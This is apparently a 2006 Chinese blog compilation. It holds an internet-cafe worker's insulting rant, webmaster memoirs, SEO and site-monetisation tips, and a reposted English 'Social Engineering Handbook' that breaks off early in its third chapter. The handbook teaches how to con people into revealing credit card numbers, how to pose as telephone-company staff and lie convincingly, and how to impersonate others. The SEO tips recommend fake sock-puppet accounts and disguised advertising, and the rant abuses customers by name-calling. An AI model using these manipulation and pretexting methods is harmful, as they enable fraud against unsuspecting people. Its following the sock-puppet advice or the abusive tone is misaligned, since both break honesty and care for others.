我说话简单直接些，相信大家都能懂，也希望大家多理解。

帮我下载点QQ币

2006-11-25T00:06:00.001-08:00

现在的网吧客人98%都他妈的SB：
开机不会、输入法切换不会、字母大小写转换不会、玩私服登陆器怎么用不会、QQ开语音不会、进了游戏不会退出。私服服务器关了说我机子问题。

老子真想一把捏死他，捏死再揉成一团，再搓成麻花，放油锅里炸，再拿出来一脚踩的粉碎。

语音聊天不会开MIC，说网吧耳机是坏的，看电影嫌不是普通话的，问我：“网管,有没有毛片看？”我说没，他怪电影不全！

QQ登陆不上说机器不好，老子跑过去一看，密码不对，那丫的还问我密码多少！

还有一个更厉害的sb小妞，接了一个不认识的网友的视频，喊我过去,问我视频里的人是谁，MD,老子还有这本事？

打个CS别人放颗烟雾弹，他遭闪了，狂喊：网管死机了……

TM的，前天一个SB MM聊QQ问我怎么打字的。我问她，你不会打字吗。她说会。我说，那你打字就行了(同时帮她调好输入法)，我怎么打不出来字啊。我说你要打什么字打不出来，她告诉我说：你先打个"你好吧"，我帮她打了。然后你们知道她怎么说的吗。你别走了。就坐在我边上帮我打字吧。

TM的，长的全然就是一个恐龙。

今天有SB问我，网管我这里怎么没有QQ币呢，你帮我下载点QQ币…… 我TM的那玩意要是能下载！我他妈地就不用上班了。

[公布赚钱功略]有毅力，有决心，肯干，月入几万绝对没问题！

2006-11-24T19:49:00.001-08:00

到街上反正就是找年轻人约会的地方，为什么是年轻人呢？年轻人血气方刚，冲动嘛。

最好白天，别晚上去找（原因不说了，自己想）。

找搂着姑娘的小伙子说：“兄弟，我扇你一耳光，给你一百元什么样？”，每试十人次，

大概有6人次会说你神经病，1人次接受你的提议（所以你得准备好至少100元作为本钱），

3人次会说“我给你一百元扇你一耳光可以不”（因其女友在侧，他必定会维护自己的尊严）。

此时，你爽快答应下来。一天之内保守估计，你应该会挨10耳光，但你会因此赚取1000元，

一个月就是3万啊！

PS：转来的

关注互联网数年,执拗的延续自己的理想

2006-11-23T20:15:00.002-08:00

凌晨一点多,女朋友睡着了,终于打算静下来写点东西了

按照惯例,时光倒退一下吧,2000年初,学会用小猫上网,瀛海威,网景浏览器,电脑爱好者,oicq,不知道现在还有多少人记得那个中国第一次上网人数狂增的年代

1.2000年下半年至2002,好像应该是暑假.和几个本地的网络爱好者组建了solo工作室,地点是我家,一个很大的房间放了六七台电脑,做了个网站51solo.com(现在没了),用的51的空间,内容是面向洛阳本地的朋友,放了江湖和许多杂七杂八的东西,其实主要还是论坛,首页还是很酷的,因为我们的美工很不错,宣传主要是很多朋友靠口头宣传,搞了一个月IP也上了1000了,后来就上大学去了,大家各奔东西,也就没时间打理了,不了了之......那时候做站就想着消遣,没有打算做大,也没有打算怎样去搞更多流量或者去赚钱
1.1那时经常上k666,也经常见"拒绝游泳的鱼"写的免费空间教程,确是帮助大一批朋友,K666的主页那时是雅客,香港一家糖果公司,一直没搞懂雅客和做站是什么关系,可能是网管因为兴趣而建的论坛吧,最经常干的事情就是潜水,找代码,找好的免费空间放资源.当时K666有很多原创的程序发布,都是很不错的,置顶的一般都是刚刚发出来的原创代码,还记得我曾经半夜在板块里隔几分钟就刷一次,因为说好今晚就发布某某程序的.现在已经找不到这么好的站了,连落伍的代码版也是灌水的一大堆,要不就是转发/买卖/交换
1.2再次就是雷傲了,那时流行CGI,因为我用的雷傲所以也是经常上去潜水.换过旅行的文本php,换过leadbbs

2大学期间,似乎是想学习,可又天天上网啊,游戏啊,就是没有想到做站上边去,一来当时生活费充裕,二来大学生活过于懒散,没有几个志同道合的朋友.但从没停止关注过互联网,因为我的兴趣这这里,那两年算是一个冷眼旁观者吧

3.恐怕要跳到2003年了,本地的一个朋友,他人在上海,搞了个本地的信息港,没时间打理,偶然在论坛遇见加QQ聊了聊,他工作忙没时间打理便把站送给我了,我重新改了版,到现在感觉不死不活的,因为上网的比例虽然大,但本地总人数太少了,这个站产生的金钱效益也是零,但在站上也认识了许多朋友,帮助本地组织了户外活动,一直到现在他们还在坛子上定期组织活动.只要生活是美好的,感觉不错就OK.

4.杀向深圳
4.12005年,来到深圳,第一年在关外做了一年的设计,用的最多的也是AI和CorelDRAW,完全是重复性的劳动,能有稳定的收入,但没意思,信息相对很闭塞,公司屏蔽了端口不能上网(港资公司),我就琢磨着,感情深圳还不如内地呢?公司还不让上网?我上班啥也学不到?期间人缘一直都还不错,还有,看不惯那种部门和部门间为了利益而冲突,做到年末,闪人,说啥也不干了,简直是浪费青春
4.2 2006年初,到深圳关内,最早是做百度的推广,个人感觉百度是05年上市才开始火起来的,百度刚开始也是靠着mp3搜索才有人气的,04年之前很少听说这个百度,本人一直用的是google和雅虎,再看看百度的用户群年龄层次,可见百度的吵作和推广能力不一般,绝大多数用户是16~23岁之间的新生代.继续正题,百度推广,电话营销的那种,我这个人一直是偏技术型的,虽然我没什么技术,但见得东西多了,知识面广了,就能搞定客户了,从没有说客户问我什么我答不上来的,做的还比较顺利,公司还顺便做网站,套模板的那种,开口就几千几千的,我之前没接触过商业做站的,当时觉得好黑啊,就是看那些老板不懂网站就漫天要价,卖东西其实就是忽悠客户,我辞职了
4.3辞职后一周我到另一家据说设计型的网络公司上班,做网站业务,我也就熟悉这块儿了,开始老板给我看了很多公司的案例,有很多深圳知名的企业,做的站设计还可以(曾经聘请的优秀设计师做的,现在看来应该说是很不错),在这个公司是我人生的转折,带我的女孩儿,应该叫一个女人吧,二十七八了,已经在深圳待了六七年了,跟她出去谈了几次单她那一套我已经非常了解了,那就是两个字,商业的精华"忽悠".我开始认识到原始的积累从来都是不干净的,那么多人证明给我看只是我没有相信过.在深圳,我只能选择接受,接下来就简单了,网站技术暂时还没有我不知道的,即使遇到懂网站制作的技术型的老板我也能说上个123,谈数据库,谈设计,都没有问题,一般谈下来都是一个站五六千,七八千,一两万,客户好搞定了,单都签回来了,又遇到一个严峻的问题,公司人手不够,老板不舍得花钱招人(一个好的设计师月薪水要四千到七八千),无法兑现对客户的承诺,不仅工期拖,功能也缩水.再加上老板多疑又小气,想方设法扣公司,什么迟到啊,见客户不回公司啊,老板小气起来真的是很简单,怪不得在深圳做了五六年还是个小公司.辞职吧,跟着这样的老板大家说有前途么?我把我的客户的网站都跟进的差不多了,就辞职
做业务的时候,其实已经和互联网,和网络技术脱节了,因为大量的时间都在跑业务,做方案,经常忙到十点才从公司回家,很累.事实上我很不喜欢做业务,有点阿谀逢迎,尔虞我诈的感觉,但是我希望自己能够自身完善一些,想做一些大事,就必须要具备一些素质,其次就是运气了.我得承认我还有很多缺点,正在锻炼自己,也在寻找机遇.

辞职以后,也就是现在.上个月的这个时候辞职了,一个月了.因为以前的客户都比较认可我,我这人做事比较负责任,所以有单都给我做,我则是转手给朋友,从中间拿一些小费维持生活,顺带做一些百度,yahoo,google跨地区的打折单.还没有打算再去上班,空闲时间重新改版了家乡的那个论坛,新搞了个SEO的站,还没搞好,比如我正在写div,QQ马上亮了要谈业务,谈完方案回过头来我已经忘记那层是怎么搞的了,又要看上半天,不想做什么投资,因为不确定这个项目的前景,找了个火山互联的免费1G,说实话,真的不是一般的垃圾,给你希望然后让你破灭的是最最垃圾的,然后落伍上有个朋友天涯@神仙给了1G,不到两周,数据库又挂了,郁闷......他的电影站最近也被baiduK了,估计他也挺郁闷的,不过月入几K比我现在的零好啊,呵呵
最近,2006年一来,因为中国上网人数的超过一亿,已经具备了商业的氛围,所以现在的中国互联网的商业气氛前所未有的高涨,几年前的泡沫那属于概念型的,而现在大家就可以开始实打实的赚人民币赚美金了,正是这一点,也造就了病毒式营销\强奸浏览器之类的卑劣手法,恐怕中国现在没有哪个上网的人不知道弹窗病毒QQ病毒了.现在处于一个朦胧的混乱的商业状态,大家都在尝试,很多人也都尝到了一些甜头,这些尝到甜头的人是用什么方法我不想多说,真正用心做事情的人很少,背地里搞些东西,然后站出来道貌岸然得说自己多么厚道,多么有能力,不想多说.其实如果谁为了金钱可以放弃一些道德的话,建议你去做一些投机的东西,然后就看运气吧
创业的热情空前了,这两年网站数量的增长恐怕赶上前几年的几倍了,个人也打算做些商业性质的站了,不能再和以前那样玩玩耍耍了,毕竟人活着都有来自于各个方面的压力,需要money来保障
本来打算顺带说说SEO的,也研究了几个月了,可是一说开就说得有点多了,三点了.下次再说吧,本篇用时01:27~3:08
PS. QQ:3265731 以后打算好好做站了,希望能和大家多多交流,敬请大家不吝赐教^_^

一个入门级站长的总结

2006-11-23T20:15:00.001-08:00

来落伍一年多了，基本每天都会来这逛逛，看了不少站长的建站故事，学到不少，结合自己1年来的建站经历，我也来谈谈我的一些心得。
1.关于程序的选择：
一定要选能采集而且生成HTML的程序,采集很重要，别说不会采，看几个小时教程就差不多学会了，只要明白了采集的原理再加上点html基础，就能采。学会采集，事半功倍。看看那些大站，哪个不是上万条数据啊，都采来的。不然就得自己手动加内容，累到你手软。我做的是CMS站，asp的比较喜欢动易cms，动易功能强大，用起来方便，官方技术支持好，更新快，模板多，缺点就是程序庞大，网站速度一般。新云的也不错，特点事程序比较精简，速度较快。PHP的喜欢dedecms，文章采集和生成html太爽了，速度N快，不过要用花钱买的mysql数据库。
2。关于域名空间：
做站起码要有个顶级域名，域名尽量用.com的，好记。关于空间，我的做法是建站初期花100块买个小空间，先用着，等流量起来了再换大空间也不迟，刚开始买好几G太浪费了。
3。关于流量和推广:搜索引擎，文本链，网摘（美女图片站效果最好），百度贴吧，百度知道，论坛AD。
以下我简单谈谈这些推广方式。
搜索引擎：百度收录最快，更新也快，雅虎其次，Google收录N慢，我的站3个多月了才收了20几页，据说是GG对每个新站都有一个考核期，太不厚道了。关于百度，论坛里谈的不少，我谈谈我的一点心得，关键词别选热的，很难排上去，而且容易被K。多想想你站的目标访客会搜什么，选那些每天搜索量不大的，几百次搜索量的那种，多做几个这样的关键词，排到第一页，OK,每天能从百度来不少IP了。
文本链和网摘：流量先锋，无忧链，cn3,大旗，帖易都不错，文本链和网摘用好了，每天能来几千IP。适合娱乐站推广。
贴吧，百度知道，论坛AD:发个“精华”帖，多弄几个马甲，自己顶，也能来不少IP。百度知道AD要小心一点，别以站长的身份来回答问题，被看出是AD就完了。
4关于赚钱:广告摆放位置很重要，不同的广告位点击率相差很大，感觉内容页效果最好。多看看大站都放哪些联盟的广告，广告摆那些位置，照做就行。

就写这么多吧，写得比较乱，希望能对各位有点帮助。

玩物尚志--飞扬的舞原创建站历程

2006-11-23T04:25:00.001-08:00

05年我也就是会使用QQ 以及在百度搜索点东西，也经常看别人的叶子，
但是始终搞不清楚这些网站到底是怎样做成的，怎样能展现在互联网上
的。----愚笨的菜鸟对陌生的环境一无所知的朦胧状态开始有了好奇心
。
05年底，我在深圳打工的第三年了。偶然一天看到了BLOG这个东东，纯
粹个人化的。当时我就想，别人能做，我自己可以吗？然后虔诚的百度
了一下，就看见http://hexun.com 有免费的BLOG提供，一个提示一个提
示的，我填写了自己的资料。终于，看见了那刚才生成的界面以及我个
人所希望的到的名字。兴奋与幸福之中。我几乎是连着7天上班都在操作
着那个免费BLOG。原创不多，却也让自己过了把瘾。就这样的，每天在
BLOG里放写东西，随着访问量的提高，自己也感觉到自己的BLOG并不是
很差劲，直到给BLOG里插入了51.la 统计，时间已经过去了7个月之久
。每天的IP平均300，PV3000左右。（http://blog.wenw.cn)时常也去看
看别人的，就这样，做站的兴趣日渐提升，甚至毫不夸张地说，春节10
天假期，我白天睡觉，晚上通宵（网络速度快），最久一次上机48小时
，消耗13碗泡面。10瓶水，6包烟。记得上网前是刮掉胡须的，可是下机
的时候明显的，我显得不是24岁了，好像42岁...... 这，就是菜鸟！毫
不含糊的说，这就是菜鸟的下场，我在楚天，视听，玩物丧志，落伍等
论坛看别人贴，求救高手
，慢慢的了解到，空间，域名，域名申请，解析，转向，源码修改（ASP
），论坛安装，FLASH制作，论坛风格制作等网络知识。
建站愿望高涨，从免费空间到收费空间，再透彻点，依深圳消费算，
我每天上网花费的钱可以买2个com 米。（公司以及住所一直没有机会拉
网线）。经济困难也出现过，但是只要有钱，马上去冲个300-500块上网
费。朋友也很惊讶的问我，说TNND你上网不游戏，不听歌，不看电影，
又没见你和哪个MM聊天，你到底干啥呀你...... 我说我TMD学习建网站
呢......说完也心虚了，也汗颜了，自己到底建了个啥网站，纯粹是个
人爱好，把所有能泡MM的时间，部分的积蓄都搭进网站，却从未说能赚
钱。可是我觉得这个不是我能做到的，我只是想，把自己所谓的网站做
好，能给互联网留下一点影子，能给别人带来点方便，我就知足了
......
现在，终于有了一个自己看来有点正规的BLOG
http://24s.net.ru 我想我还是会努力的做好网站，不管以后怎么样，
做好眼前能做的，我就满足了。
不敢说我自己做了个什么东东就开始辛酸，就开始累了，比起落伍
，我只能是大海中的一粒沙子，但是，我的确肯付出，也努力了！

学好五招,让网站为您赚钱

2006-11-23T04:23:00.000-08:00

做站没流量不行,有流量了没钱不行,结合我自己的做站经历,把自己做站的几个经验无私贡献给喜欢网页吧的朋友.

1:做站采集的信息要与众不同。做站不要老是去一些著名的站采集信息，那些信息别人早就看了，没新意，很多做站的，一些站长特别喜欢去站长站采集信息，其实没必要，选用一点点就可以了，有的甚至是完全和他一样，他搞了什么你就搞什么，那是肯定发展不起来的，我做的网页吧一般不去那里采集数据，我去论坛，去另外一些别人都不知道的小站采集，这样做的效果，会让来你站的人觉得你的站和别人确实不同。只有这样你的站才可以发展起来。

2：应该有自己的原创作品。一个站要做大，应该自己也写点东西，不要一年四季就知道采集别人的，要自己多写点，写不出来，你一个月写一篇也好，写的出来就尽量多写。写的东西要注意的是：最好连续几天从不同的方向写同一个主题。这样被转载，被讨论的机会就比较多，讨论多了，转载多了，你的站就有名气了。

3：站要出名，学会吵做。名人要出名，就要搞点花边，比如某某是刘德华的第一女朋友啊，某某和李湘结婚了又马上离婚了。做站也一样，要有知名度就必须学会吵做，天极借百度的事情大肆吵做，雅虎与奇虎的喜欢雅吵做，奇虎就借雅虎出名了，周鸿袆是个吵做高手，也有人说他是流氓，无论他是不是流氓，有一点可以肯定，他很会吵做。
admin5.com站长资讯

4：学会搜索引擎优化，也就是天天谈的SEO。SEO其实不是什么特别高深的学问，很多网站有专门的文章讨论，大家可以去网页吧的网站运营栏目看看，另外图王的站也有很多，老鬼的站也有很多，还有点石的站，都很不错。有个优化可能很多文章没提到，我根据自己的经验讲下：如果您想某个关键字被搜索引擎收录，你可以让这个字在你的站多次出现，并且加粗，比一般的字大很多。

5：要让站能够赚钱。一个网站要发展，只有兴趣是不够的，还要让站为你赚钱，怎么赚钱？比较好的方法有几个。一是选择卖一些与你的网站内容相关的产品，比如你做站长类站的，你可以卖主机卖域名，二是可以做一些联盟广告，可以投放一些名气大的广告联盟的广告，这样可以保证你的钱能够到你的帐。三是做包月广告，如果你的流量足够大了的话。先钱后广告最可靠。我的站一直只做包月广告，我就觉得先拿到钱了踏实。

对教育类网站的一些看法

2006-11-23T04:22:00.000-08:00

目前国内大大小小的教育网站非常之多。按是否商业运营可分为两大类：一、非经营性网站，此类网站由政府拨款建设，各地教育部门管理运营，教学资源免费使用。由于体制的原因发展较慢；二、商业网站，此类网站由企业投资或者占较大比重，商业化运作。企业投资的教育信息服务、教学资源、增值服务、教育城域网属于此类。重点分析商业网站，商业网站运营模式大概有如下几类：
（一）基础网络服务大部分经营性教育城域网如科利华教育教学资源网，这种网站收费方式简单稳定，但有失公平，发展模式欠佳。
（二）网校模式 “名校＋名师＋同步教学＋在线辅导”，如101网校、北京四中网校等，如果有这样的优势资源，考虑的是如何提高教学成果，及品牌推广，以及提高教师，家长对品牌的认可程度，任重到远，需要长期投资，方可见效。
（三）信息服务模式教育信息网站，已经有教育部下属的中国教育信息网，其权威性难以动摇，后来者没有优势资源，难以立足。
（四）教育idc+asp模式主要是一些IDC运行商通过建设一个功能强大的网络和应用系统平台，设立数据中心，通过此系统平台上为各级教育单位构建网络门户以及教学、办公和管理的应用程序和教学资源库，提供各种网络应用和增值服务.某前许多中小学校拥有自己的的服务器，此种已经失去不少市场。
（五）电子商务模式提供产品在线交易，通过网络销售教育产品，包括书籍、杂志、教育资源、教育用品等，主要收益来自于交易佣金及VIP会员费，及广告费用。
电子商务模式是目前前景看好的发展模式，也是要重点讨论的。以k12为例，探讨教育网站发展。该网站教育资源，尤其教师需求量很大的课件资源很丰富，“已长成为全国人气最旺的教师原创资源汇聚地以及教师论坛中心”，他之所以在众多的教育资源站重托因而出，他的优点又有什么？
1 资源数量大，网站的内容丰富，实用，针对性强，垂直领域很专业。
2 资源质量高，K12的许多课件资源都是一线教师的原创作品，做为时下盗版泛滥的中国，原创即是合法的发展手段也是对知识产权的保护，网站的长期发展必须有自己的原创的内容，而这需要充分调动广大教师朋友的积极性，也就是要尊重他们对自己作品版权。
3 多级别会员制会员制的发展，更有利于网友（主要是教师）享受自己的权利，履行直接的义务。从网站的角度讲，可以增加用户的粘性，有一种归属感。
4 先进实用的支付手段目前，国内网站的支付多为网银在线，支付宝等，但作为普通的网名，开通网上银行的很少，且很多人不会使用，所以这大大制约了网站电子商务的发展。K12推出的短信支付，声讯电话等支付手段更贴近用户，降低了用户操作难度。
5 举办大型活动定期通过各种大型活动的举办，提高了网站的知名度与权威性，也获得了大量第一手的原创课件，教案等优质资源。
6 互动性 K12在建立论坛的同时增加了个人专辑，这在一定程度上提高了用户的向心力，还有利于提高用户粘度，提高网站访问的回头率。用户在推广自己个人专辑的同时也推广了网站，有利于网站发展。
7 用户体验性一个网站，如果用户在使用过程重感觉很麻烦，或者找不到方向，他还会再来吗？所以，要站在用户的角度，为用户创造更便利的使用体验。
8 在线服务对于用户的要求，意见，建议，第一次时间给于答复与解决，这些现在许多公司做的很好，邮件服务常在10分钟内即可给于回复。
10 地域性由于现在教材版本的问题,必须要考虑不同的地区教育的差别性,像目前的人教版,苏教版等不同的版本分类.
10 服务器速度由于电信网通互访的问题，必须解决不同用户的访问速度问题。试想如果2分钟也打不开的网站，还会有人再来吗？
11 seo优化，搜索引擎在网站的流量中所占重越来越大，seo优化对于网站的推广甚为重要。

作为基础教育网站,他的直接受众是广大的中小学教师，需要针对性的做好宣传推广。教育类站点也是一项长期的投资，他的发展是循序渐进的过程，但前景是可预见的。

嘎嘎米版权所有

MY COOL WINDOWS LIVE IDs

2006-11-22T03:52:00.000-08:00

Few days before,I get some cool windows live IDs. they are short and beautyful.
Like 716#live.com 719#live.com 733#live.com and 823#live.com .I have about 20 IDs like those. and some like alm#live.com , uvs#live.com , lair#live.com , neuk#live.com. Also ,i have some IDs that end with live.tr or live.nl or it or be.
Like
inn#live.nl
17#live.nl
19#live.nl
44#live.nl
222#live.nl
4444#live.nl
7777#live.nl
and
google@live.be
ad@live.be
ak@live.be
ak@live.it
inn@live.it
seo@live.it
ko@live.it
44@live.it
nasa@live.it
hack@live.be
hack@live.co.uk
hack@live.de
hack@live.fr
And d@live.tr
g@live.tr
h@live.tr
i@live.tr
<strong>COOL!</strong>

Windows Live Safety Center 为您的计算机提供免费的安全扫描服务。它是免费的！

The Social Engineering Handbook

2006-11-22T03:22:00.000-08:00

文章作者：Sirkuit and Phrantic Anima

___________________________________________________________________________
|\\\\\\\\\\\\\\\\-----The Social Engineering Handbook-----////////////////|
|////////////////------By Sirkuit and Phrantic Anima------\\\\\\\\\\\\\\\\|
|||| ||||
|||| "That which thinks shall not be infected" -Sirkuit, 1998 ||||
|||| ||||
|||| You can't expel the machine, but you can maniplulate and resist ||||
|||| ||||
|\\\\\\\\\\\\\\\\ Version 1.0 ////////////////|
|----------------<--------------------------------------->----------------|
|//////////////// http://n0p.crashcentral.com \\\\\\\\\\\\\\\\|
---------------------------------------------------------------------------

---|Table Of Contents|---

PREFACE: Introductions to Social Engineering

CHAPTER 1: Physiognamy

CHAPTER 2: Nuero Linguistics
-SECTION 1: Saying What They Want To Hear
-SECTION 2: How To Lie
-SECTION 3: Changing The Subject

CHAPTER 3: Gathering Information
-SECTION 1: Watching People
-SECTION 2: Shoulder Surfing
-SECTION 3: Dumpster Diving

CHAPTER 4: In Your Face Engineering
-SECTION 1: Becoming Someone Else
-SECTION 2: Dressing For The Occasion

CHAPTER 5: Randomizing Yourself

CHAPTER 6: Social Programming

CHAPTER 7: Art or Science?

CHAPTER 8: Where To Go From Here

GLOSSARY OF TERMS

CONTACT/MISC INFORMATION

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

PREAFACE: Introduction to Social Engineering

What is social engineering? Social Engineering is just a nice word for
conning. Conning a Telco employee into giving out numbers, conning a mark
into giving out his credit card number, or even just conning the girl at
the corner shop into going out with you on Friday night. The aim is to
achieve your goals by engineering the situation, and it's all about
control.

Engineering the situation requires planning. You must always remember that
it is much easier to direct a controlled situation than it is to direct an
uncontrolled one. When the ball's in your court, you have nothing to prove,
and everything to gain. You don't have to waste time proving your
worthiness to be in that situation. It's your situation. The other
person(s) is in YOUR territory. (Excuse my vagueness.)

A common thing people mistake when learning about social engineering is
that it is all about commiting crimes. That is completely untrue. Social
engineering has a plethora of uses, it just so happens that some of its
main applications are considered criminal. Well, what about its other uses?
Say you have a friend who is about to hear something that will upset her
greatly, and that it is NOT something she needs to know. You can use your
knowledge of scoial engineering to create a spontaneous lie to protect her
from the truth. That would require you to learn how that specific person
would react to different things you would say so that you could create a
lie that not only would help her by not revealing whatever ugly truth there
is, but will not allow any suspicion to arise.

Like I said before, social engineering is about conning, but it doesn't
have to be for criminal uses. 90% of it is just the research you have to do
to be able to engineer a situation.

What kinds of things will you have to learn to be a successful social
engineer? You have to watch how people behave, react, learn how people
think, learn to spot human weaknesses, learn what words to use when
speaking to what people, etc. etc. etc. The list goes on and on. If you're
ready to jump one step up above everyone else, read on.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CHAPTER 1: Physiognamy

Physiognamy is a belief system, commonly used in the middle ages, that says
you can interpret peoples' personalities by looking at some of their
physical features. The way I am going to talk about it will show it as a
way to create temporary stereotypes towards people with certain physical
characteristics so that you may have a better chance at engineering a
situation with them involved. Keep in mind that I am not encouraging you
to stereotype people, but merely to make educated assumptions so that you
may be better prepared when dealing with people.

I suggest, as I do with everything in here, that you go out and research
Physiognamy elsewhere to get a broader perspective of it. What you must do,
is learn what specific physical characteristics might mean about a person,
and learn how to decipher how true they possibly could be based on a
combination of the physical characteristic and any personality traits they
show when talking to them or watching them. You'd be surprised just how
accurate this can be. Below I will list several common physical traits and
what they might mean. As far as going beyond that, you must go out and do
some field work on your own to let this list grow.

Calloused Hands: This has a very high rate of meaning the person in mind
does either a fair amount of housework, or has a job involving manual
labor. You must make sure to see where the callouses are. If they are only
on certain places on the fingers for instance, this might just mean the
person plays guitar. All in all, it allows you to make the stereotype that
this person is not lazy, or at least is not lazy when it comes to things
that they enjoy doing.

Scars: People with multiple small scars are usually very active. Probe them
to find out where they got these from without directly asking (for example,
they may skateboard or ride bikes). Scars can have many, many possible
meanings.

Bad Acne: Acne is something most teenagers have at one time or another. If
someone has lots of white heads, you can guess that they aren't as insecure
about their appearance as msot peple are. Kids that are really insecure
usually check themselves all the time and pop the little buggers. Of course
the person just could have ti so bad they can't keep up, but you must
remember that the point here is to make educated assumptions and that you
won't be right all the time.

Lot's Of Makeup: This can mean a lot of things, but the most common are
that of insecurity or strong personal creativity. Look to see if it appears
as if the makeup is being used to cover up things, or to make the face
stand out. When guys wear makeup it is the same thing, but when you see a
male using makeup to cover up something that hints at very large
insecurities.

Wandering Eyes: Wandering eyes usually mean at least one of three things:
Lying, being intimidated, or paranoia... paranoia being the least usual
one of the group. When someone is intimidated or frightened they try to act
preoccupied with something else in their environment to avoid having to
make any form of contact with the person they are intimidated/frightened
by. Another common thing with that is the person will open up a book and
act like they are reading, look at their watch, or act like they are trying
to find something in their pockets. If you can intimidate someone, you have
greatly increased your chances of being able to engineer them. About the
lying... when most people lie they are afraid that you might discover
them, so for some reason they don't like to make direct eye contact.

"Strange" Clothing: When someone dresses out of the norm it is usually for
one of two reasons. Either they are trying to look weird to "be cool" or
because they like how it looks and detest the rampant conforming going on
by most people. If they act mature and speak very intelligently they are
usually dressing odd for the second reason and not to just "be cool."

That should be more than enough to get you started. Mosty likely you will
find new things that some of the above characteristics point to on your
own. The most important thing to remember though is to ALWAYS try to find
more than one physical trait that points to the same personality trait you
are suspecting the specific individual to have.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CHAPTER 2: Nuero Linguistics

SECTION 1: Saying What They Want To Hear

Now that you have some good ideas about how to use social engineering to
control situations, you must learn to speak in a manner that will make
the target feel comfortable, or to talk in a way that will get them to say
things that they normally wouldn't (for example, credit card #'s and the
like).

The first thing you must do is learn as much as you can about the person,
that way you can plan how you will approach the problem. The main goal at
first will be to get on their good side. For instance, if they like sports
you should ask what their favorite team is, then reply with something like
"Oh my God, that's my favorite team too! They're the greatest!" Ok, so that
sounds stupid... that's why I'm leaving most of this up to you.

Once you have a foothold on the person, begin to pry at them, always prying
by using words and phrases that you feel will be to their liking. Finding
out what people want to hear is the most difficult part of social
engineering, and takes long hours of studying to even come remotely close.

Here's a small example to get you going. It will be in the form of
dialogue. The person's (you) goal here is to discover secrets about this
girl's relationship with her current boyfriend.

You: So what do you really dislike that guys usually do?

Her: I don't know, it just pisses me off when they feel like they own you.

You: Yeah, I think guys that do that are fucking idiots.... it makes me so
sick ya know?

Her: Oh yeah, I know EXACTLY what you mean!

You: Your boyfriend isn't like that is he? Sorry to ask, but it sounds like
you're kinda upset now that type of thing was mentioned.

Her: Oh it's no problem... I dunno, he kinda acts like that sometimes... it
makes me so angry.

You: Why are you still with him then? You don't need to deal with that
crap.

There you go, you just hooked yourself a big one! Most people won't come
outright and start telling you details of such things as relationships
simply because they are personal. As you saw above though, if you can
get some sort of commonality going between you two, even if you were
lying, you just about own the conversation.

If I were to go over all aspects of this section, you'd have quite the
large amount fo reading to do. So, instead of writing all that out, I
encourage you to take notes and develop your knowledge of this yourself.
Learning what to say to what people is THE MOST IMPORTANT part of social
engineering, bar none.

SECTION 2: How To Lie

As you should already know, lying is an important part of this game.
You have to be good at it. Most people, when they first start social
engineering, have never told a major lie in their life. This doesn't
matter. In my experience, what it all comes down to is acting skill.
When I first started social engineering I was a drama student. I spent
4 years learning the art of becoming someone else. What I learnt was
that it was all about research. You can never do enough research on a
topic. You never know what you're going to have to know to pull off a
scam. Assuming that you are already a confident speaker, (if not, then
there's something you have to work on) what you should really be
studying is the art of RESEARCH.

What you have to research is the tricky part. It all depends on the
type of lie. To my knowledge, there are 3 common types of lies, each more
difficult that the last:-

Type 1: A lie that you tell on the phone to someone in order to get
information out of them, or to convince them you're someone you're not.
These include telling people you are a Telco worker, shop assistant,
whatever.

Type 2: A lie that you tell someone in person, in order to get information
out of them, or to convince them you're someone you're not. These types of
lies are somewhat harder than the phone ones, as body language has to be
taken into account.

Type 3: An unspoken lie. These are definately the hardest, as they can
only be done in person. These lies use nothing but body language and
appearance to convince people. A good example of this is avoiding being
carded when you go out with friends. If you manage to pull off the effect
that you are over 18, then no one (almost) actually asks for ID.

Tips for Type 1 lies:-

Before you even pick up the phone, think about who you are going to say
you are. When you think you have chosen a role best suited for the
person you are calling, research them. How do they talk? Fast or slow?
Is a false accent going to make you more convincing? Are they a
demanding type of person? Are they going to just sit on the phone and
agree with whatever the mark says? These are all things you have to
think about. There are hundreds more, but most of them are
situation-specific, so I can't mention them all. OK, once you know how
you are going to speak, you have to figure out what you are going to
say. Most of the time this will involve acting like a store worker or
something along those lines, so what you have to find out is if they
have some kind of protocol they have to follow on the phone. Usually it
something like, "Hello this is from . Can I
please speak to ?". When you think you have that down pat, the
only thing you can do to help you out is to ring a friend and ask them
if you sound convincing.

Tips for Type 2 lies:-

To pull off this kind of lie you should read the tips for Type 1 lies,
because it'll take all that and a little bit more. You have to know how
your "character" speaks, acts, even looks. Getting hold a uniform is
probably the easiest way to look like someone else, but it doesn't stop
there. You have to consider what kind of life these people lead. The
previous section on physiognamy outlined a few indicators as to how a
person's job might affect their appearance. Be sure to take all this
into account when you are getting ready for your meeting. After this,
all you really have to control is your body language. Use your hands to
speak if you have to. Keep them in your pockets if you have to. It
really doesn't matter what your specific actions are, just don't do
something that'll blow your cover.

Tips for Type 3 lies:-

These are by far the hardest to do, and (thank god) don't come about
too often. Like I mentioned before, they usually only happen when you're
trying to do something, (visit a bottle shop, say) when you're underaged.
These lies are all about body language. You have to look so convincing in
your role, that no-one questions your credibility. My friend once managed
to bluff his way into a formal dinner just by wearing a suit and acting
like the crowd that he was mingling with. His secret was to give the air
of a formalized person who was a member of a distant branch of the company
holding the function. They all accepted him, and he only ever had to speak
about the company once. The trick is to copy. Look at how everyone else is
acting, and just do that, maybe making a few changes to suit your own
personalized style.

Lying, as I have mentioned before, is difficult. It requires practice, a
bit of experience, and luck. My only advice to you is not to give up. If
you can't get the information you need, just look at alternative methods.
See the chapter "Gathering Information" for more tips on how to get what
you want.

SECTION 3: Changing The Subject

This is a relatively simple thing to do. Say you are in a situation in
which you want to change the subject of the conversation. All you must do
is use the skills you've learned since reading SECTION 1 of this chapter (I
know you've been practicing... right?) to learn what subjects in life the
target is favorable to. Now all you have to do is somehow link the subject
you wish to change to with one of those things that the person likes. That
should enable you to create some transition sentences that will effectively
get the subject of the conversation changed.

Another way is to force the new subject on. When you want to change the
subject, merely get all excited and say things to the effect "Oh my god oh
my God!" over and over and act like what you want to talk about is sooooooo
cool and important. With a lot of people, especially the denser ones, this
will work beautifully.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CHAPTER 3: Gathering Information

SECTION 1: Watching People

